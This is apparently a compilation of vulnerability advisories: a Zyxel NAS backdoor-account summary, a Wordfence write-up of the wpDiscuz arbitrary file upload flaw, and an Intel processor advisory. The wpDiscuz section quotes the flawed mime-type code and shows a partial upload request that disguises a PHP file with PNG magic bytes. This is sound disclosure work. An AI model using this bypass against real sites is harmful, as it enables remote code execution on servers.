Certain Zyxel products have a locally accessible binary that allows a non-root user to generate a password for an undocumented user account that can be used for a TELNET session as root. This affects NAS520 V5.21(AASZ.4)C0, V5.21(AASZ.0)C0, V5.11(AASZ.3)C0, and V5.11(AASZ.0)C0; NAS542 V5.11(ABAG.0)C0, V5.20(ABAG.1)C0, and V5.21(ABAG.3)C0; NSA325 v2_V4.81(AALS.0)C0 and V4.81(AAAJ.1)C0; NSA310 4.22(AFK.0)C0 and 4.22(AFK.1)C0; NAS326 V5.21(AAZF.8)C0, V5.11(AAZF.4)C0, V5.11(AAZF.2)C0, and V5.11(AAZF.3)C0; NSA310S V4.75(AALH.2)C0; NSA320S V4.75(AANV.2)C0 and V4.75(AANV.1)C0; NSA221 V4.41(AFM.1)C0; and NAS540 V5.21(AATB.5)C0 and V5.21(AATB.3)C0.

1.  Homepage
2.  Support
3.  Security Advisories

**We care about your network security. It’s our highest priority, and it’s what drives us to deliver the timely, useful advice on emerging vulnerabilities that you’ll find below. But there are also a few practices that it’s good common sense to follow at all times:**

*   Change the default password as soon as you log in to a new device for the first time
*   Use strong, unique passwords for every device and **change them regularly**
*   Ensure your devices are **running the latest available firmware**
*   Don't enable remote access unless it's absolutely necessary

If you’d like to receive the notification about our Security Advisory alert, please click the below button to fill in the info.

**Zyxel Product Security Incident Disclosure Policy**

Zyxel takes security issues very seriously, and keeping our customers safe is Zyxel’s primary concern. The Zyxel Product Security Incident Response Team (PSIRT) responds to vulnerability reports, investigates the reported vulnerabilities, and implements the best course of action to protect our customers. Zyxel is also authorized as a CVE Numbering Authority (CNA). This recognizes Zyxel’s commitment to security disclosures and will enhance our vulnerability reporting.

If you have discovered a security vulnerability in Zyxel products, we appreciate your help in reporting it to us in a responsible manner. The advance notice allows our PSIRT team to coordinate a patch or workaround which allows our customers to protect themselves before attackers have the opportunity to exploit the issue.

Note: Zyxel does not have a security bug bounty program for reported vulnerabilities.

*   Report a Security Vulnerability
    
*   Download PGP Public Key

CVE-2020-13365: Security Advisories | Zyxel

A Remote Code Execution vulnerability exists in the gVectors wpDiscuz plugin 7.0 through 7.0.4 for WordPress, which allows unauthenticated users to upload any type of file, including PHP files via the wmuUploadFiles AJAX action.

On June 19th, our Threat Intelligence team discovered a vulnerability present in Comments – wpDiscuz, a WordPress plugin installed on over 80,000 sites. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.

We initially reached out to the plugin’s developer on June 18, 2020, and after establishing an appropriate communication channel, we provided the full disclosure details on June 19, 2020. The developers responded on June 20, 2020 to let us know a patch would be coming in version 7.0.4. After several follow-ups, an initial patch was released on July 19, 2020, and a sufficient patch was released on July 23, 2020.

This vulnerability was introduced in the plugin’s latest major version update.This is considered a critical security issue that could lead to remote code execution on a vulnerable site’s server. If you are running any version from 7.0.0 to 7.0.4 of this plugin, we highly recommend updating to the patched version, 7.0.5, immediately.

Both Wordfence Premium and free users are protected by any attacks attempting to exploit this vulnerability due to the firewall’s built-in malicious file upload protection.

wpDiscuz is a plugin designed to create responsive comment areas on WordPress installations. It allows users to discuss topics and easily customize their comments using a rich text editor. In the latest overhaul of the plugin, versions 7.x.x, they added the ability to include image attachments in comments which are uploaded to the site and included in the comments. Unfortunately, the implementation of this feature lacked security protections creating a critical vulnerability.

The wpDiscuz comments are intended to only allow image attachments. However, due to the file mime type detection functions that were used, the file type verification could easily be bypassed, allowing unauthenticated users the ability to upload any type of file, including PHP files.

**Retrieving the Mime Type**

The ‘`getMimeType`’ function used three different methods to determine a file’s mime type. The first check used `mime_content_type`, which determines a file’s type based on the file’s content. If that PHP function wasn’t available, it would use `finfo_file`, which also determines a file’s mime type based on the file’s content. Finally, if that function wasn’t available, then it would use `wp_check_filetype`, which is a WordPress-specific filetype check that determines a file’s mime type based on the file’s name and matches it against a built-in list of allowed file types.

Most files begin with several so-called “Magic Bytes” which are a specific signature that can be used to determine their Mime type. Unfortunately, due to how PHP processes files, it ignores everything in the file before the opening `<?php` tag. As such, the first two functions used could easily allow for files to be spoofed and appear as allowed image files simply by adding image-specific magic bytes. For example, a user could insert the magic-bytes for a .png file, `89 50 4E 47 0D 0A 1A 0A`, at the beginning of a PHP file and fool the first two functions.

 foreach ($files as $file) {
   $error = false;
   $extension = pathinfo($file\["name"\], PATHINFO\_EXTENSION);
   $mimeType = $this->getMimeType($file, $extension);

…

   private function getMimeType($file, $extension) {
        $mimeType = "";
        if (function\_exists("mime\_content\_type")) {
            $mimeType = mime\_content\_type($file\["tmp\_name"\]);
        } elseif (function\_exists("finfo\_open") && function\_exists("finfo\_file")) {
            $finfo = finfo\_open(FILEINFO\_MIME\_TYPE);
            $mimeType = finfo\_file($finfo, $file\["tmp\_name"\]);
        } elseif ($extension) {
            $matches = wp\_check\_filetype($file\["name"\], $this->options->content\["wmuMimeTypes"\]);
            $mimeType = empty($matches\["type"\]) ? "" : $matches\["type"\];
        }
        return $mimeType;
    }

**Verifying Allowed File Types**

The issue was escalated with the ‘`isAllowedFileType`’ function that did a check to see if the file was an allowed file type as it used the mime from the ‘`getMimeType`’ function. Due to the fact that the ‘`getMimeType`’ function used functions to obtain a file’s mime type based on file content, any file type could easily be spoofed to look like an allowed file type and pass this check.

   private function isAllowedFileType($mimeType) {
        $isAllowed = false;
        if (!empty($this->options->content\["wmuMimeTypes"\]) && is\_array($this->options->content\["wmuMimeTypes"\])) {
            $isAllowed = in\_array($mimeType, $this->options->content\["wmuMimeTypes"\]);
        }
        return $isAllowed;
    }

**The Exploit Possibilities**

This made it possible for attackers to create any file type and add image identifying features to files to pass the file content verification check. A PHP file attempting to bypass this verification could look something like this in a request:

`------WebKitFormBoundaryXPeRFAXCS9qPc2sB`  
`Content-Disposition: form-data; name="wmu_files[0]"; filename="myphpfile.php"`  
`Content-Type: application/php`

`‰PNG`

The file path location was returned as part of the request’s response, allowing a user to easily find the file’s location and access the file it was uploaded to the server. This meant that attackers could upload arbitrary PHP files and then access those files to trigger their execution on the server, achieving remote code execution.

If exploited, this vulnerability could allow an attacker to execute commands on your server and traverse your hosting account to further infect any sites hosted in the account with malicious code. This would effectively give the attacker complete control over every site on your server.

Fortunately, both Wordfence Premium users and those still using the free version are protected against this vulnerability due to the firewall’s built-in malicious file upload protection.

**Another way to stay protected.**

Wordfence has a feature to disable code execution in the uploads directory. We highly recommend enabling this setting as it will provide additional protection against vulnerabilities like this one that may erroneously allow PHP files to be uploaded into the uploads directory. With this option enabled, attackers will not be able to execute PHP files uploaded into the upload directory, providing an extra layer of security and assisting in thwarting attacks like this one. In the event that a zero-day vulnerability is discovered and actively exploited prior to the creation of a custom firewall rule, having this feature enabled can help keep your site protected.

You can find this feature by going to Wordfence -> All Options -> General Wordfence Options -> ‘Disable Code Execution for Uploads directory’. Simply check the box to enable the feature and save your changes.

![](https://www.wordfence.com/wp-content/uploads/2020/07/disablefileexecution-300x155.png)

The ‘Disable Code Execution for Uploads directory’ option location.

**Proof of Concept Walkthrough**

Due to both the critical severity of this vulnerability and ease of exploitation, we did not create a proof of concept walkthrough video for this vulnerability at this time. If you are interested to learn how this vulnerability might be exploited, join us for Wordfence Office Hours on Tuesday, August 4th at 12:00 EST. This allows us to give users sufficient time to update and still provide you with the in-depth details on how this could have been exploited on unprotected sites at a later date.

**Disclosure Timeline**

**June 18, 2020** – Initial discovery of vulnerability. We verify the Wordfence firewall provides protection against exploit attempts and we make our initial contact attempt with the plugin’s team.  
**June 19, 2020** – Plugin team confirms inbox for handling disclosure. We send full disclosure details.  
**June 20, 2020** – The plugin’s team let us know that a patch will be released in version 7.0.4.  
**July 6, 2020** – Follow-up as no patch has been released.  
**July 10, 2020** – They respond to let us know a patch is coming in 1-2 days.  
**July 13, 2020** – Follow-up as no patch has been released.  
**July 15, 2020** – They respond saying a patch will be released by the end of week.  
**July 20, 2020** – A patch has been released. We check the patch and see that vulnerability is still exploitable and inform them.  
**July 23, 2020** – A sufficient patch has been released in version 7.0.5

**Conclusion**

In today’s post, we detailed a flaw in wpDiscuz that provided unauthenticated users with the ability to upload arbitrary files, including PHP files, and execute those files on the server. This flaw has been fully patched in version 7.0.5. We recommend that users immediately update to the latest version available, which is version 7.0.5 at the time of this publication.

Both sites using Wordfence Premium and those still using the free version of Wordfence are protected from attacks against this vulnerability. If you know a friend or colleague who is using this plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected as this is a critical security update.

CVE-2020-24186: Critical Arbitrary File Upload Vulnerability Patched in wpDiscuz Plugin

Insufficient control flow management in some Intel(R) Processors may allow an authenticated user to potentially enable a denial of service via local access.

**Select Your Region**

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2021.2 IPU - Intel® Processor Breakpoint Control Flow Advisory**

**Summary: **

A potential security vulnerability in some Intel® processors that may allow a denial of service.  Intel® is releasing firmware updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2021-0127

Description: Insufficient control flow management in some Intel(R) Processors may allow an authenticated user to potentially enable a denial of service via local access

CVSS Base Score: 5.6 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:H

**Affected Products:**

*   6th Generation Intel® Core™ Processors
*   7th Generation Intel® Core™ Processor Family
*   8th Generation Intel® Core™ Processor Family
*   9th Generation Intel® Core™ Processor Family
*   10th Generation Intel® Core™ Processor Family
*   Intel® Celeron® Processor G Series
*   Intel® Core™ X-series Processors
*   Intel® Pentium® Gold Processor Series
*   Intel® Xeon® Scalable Processors
*   2nd Generation Intel® Xeon® Scalable Processors
*   3rd Generation Intel® Xeon® Scalable Processors
*   Intel® Xeon® Processor W Family
*   Intel® Xeon® Processor E Family
*   Intel® Xeon® Processor E3 v6 Family
*   Intel® Xeon® Processor D Family
*   Intel ® Xeon® Platinum 81xxD
*   Intel® Xeon® Processor E3 v5 Family

**Recommendations:**

Intel recommends that users of the above listed Intel® Processors update to the latest firmware version provided by the system manufacturer that addresses this issue.

**Acknowledgements:**

This issue was found externally.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

02/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel, processors, chipsets, and desktop boards may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at https://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  
Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

Search

lenovo warranty check/lookup | check warranty status | lenovo support us